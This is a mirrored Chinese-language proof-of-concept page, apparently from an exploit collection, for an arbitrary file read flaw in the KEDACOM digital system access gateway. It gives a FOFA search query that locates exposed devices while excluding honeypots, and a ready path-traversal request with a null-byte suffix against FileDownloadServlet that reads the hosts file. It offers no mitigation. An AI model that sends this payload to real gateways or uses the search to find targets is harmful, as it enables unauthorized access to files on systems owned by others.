mirror of
https://github.com/Threekiii/Awesome-POC.git
synced 2025-11-07 20:06:03 +00:00
31 lines
730 B
Markdown
31 lines
730 B
Markdown
|
|
# KEDACOM数字系统接入网关 任意文件读取漏洞
|
||
|
|
|
||
|
|
## 漏洞描述
|
||
|
|
|
||
|
|
KEDACOM 数字系统接入网关 存在任意文件读取漏洞,攻击者通过构造请求可以读取服务器任意文件
|
||
|
|
|
||
|
|
## 漏洞影响
|
||
|
|
|
||
|
|
```
|
||
|
|
KEDACOM 数字系统接入网关
|
||
|
|
```
|
||
|
|
|
||
|
|
## FOFA
|
||
|
|
|
||
|
|
```
|
||
|
|
(app="KEDACOM-DVR接入网关") && (is_honeypot=false && is_fraud=false)
|
||
|
|
```
|
||
|
|
|
||
|
|
## 漏洞复现
|
||
|
|
|
||
|
|
登录页面如下
|
||
|
|
|
||
|
|

|
||
|
|
|
||
|
|
使用POC读取 /etc/hosts
|
||
|
|
|
||
|
|
```plain
|
||
|
|
/gatewayweb/FileDownloadServlet?fileName=test.txt&filePath=../../../../../../../../../../Windows/System32/drivers/etc/hosts%00.jpg&type=2
|
||
|
|
```
|
||
|
|
|
||
|
|

|